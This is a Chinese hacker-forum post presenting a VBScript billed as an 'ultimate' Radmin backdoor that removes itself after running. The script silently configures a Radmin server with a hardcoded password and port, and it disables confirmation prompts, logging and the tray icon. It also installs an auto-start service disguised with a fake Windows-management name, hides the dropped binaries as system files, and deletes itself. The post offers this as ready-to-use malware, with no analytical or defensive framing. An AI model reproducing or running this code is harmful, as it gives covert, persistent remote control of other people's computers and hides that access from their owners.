华域联盟 vbs Vbs脚本实现radmin终极后门代码_删除自身

Vbs脚本实现radmin终极后门代码_删除自身

复制代码 代码如下:

on error resume next 

const HKEY_LOCAL_MACHINE = &H80000002 

strComputer = "." 

Set StdOut = WScript.StdOut 

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_  

strComputer & "\root\default:StdRegProv") 

strKeyPath = "SYSTEM\RAdmin" 

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 

strKeyPath = "SYSTEM\RAdmin\v2.0" 

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 

strKeyPath = "SYSTEM\RAdmin\v2.0\Server" 

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 

strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" 

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 

strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 

Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") 

strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) 

uBinary = Array(1,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) 

uBinary = Array(0,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) 

uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此为注册表导出十六进制转为十进制数据 pass:241241241 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密码 

uBinary = Array(5,4,0,0)      //端口:1029 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) 

uBinary = Array(10,0,0,0) 

Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) 

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 

strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 

strValueName = "LogFilePath" 

strValue = "c:\logfile.txt" 

set wshshell=createobject ("wscript.shell") 

a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) 

oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") 

strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" 

strValueName = "Description" 

strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." 

oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strValueName = "DisplayName" 

strValue = "Windows Management Instrumentation Player Drivers" 

oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strValueName = "ImagePath" 

strValue = "c:\windows\system32\Exporer.exe /service" 

oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

set wshshell=createobject ("wscript.shell") 

a=wshshell.run ("net start WinManageHelp",0) 

b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) 

c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) 

d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) 

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自删除

最好的删除代码不错

createobject("scripting.filesystemobject").deletefile(script.scriptname)

您可能感兴趣的文章:

本文由 华域联盟 原创撰写:华域联盟 » Vbs脚本实现radmin终极后门代码_删除自身

转载请保留出处和原文链接:https://www.cnhackhy.com/15180.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部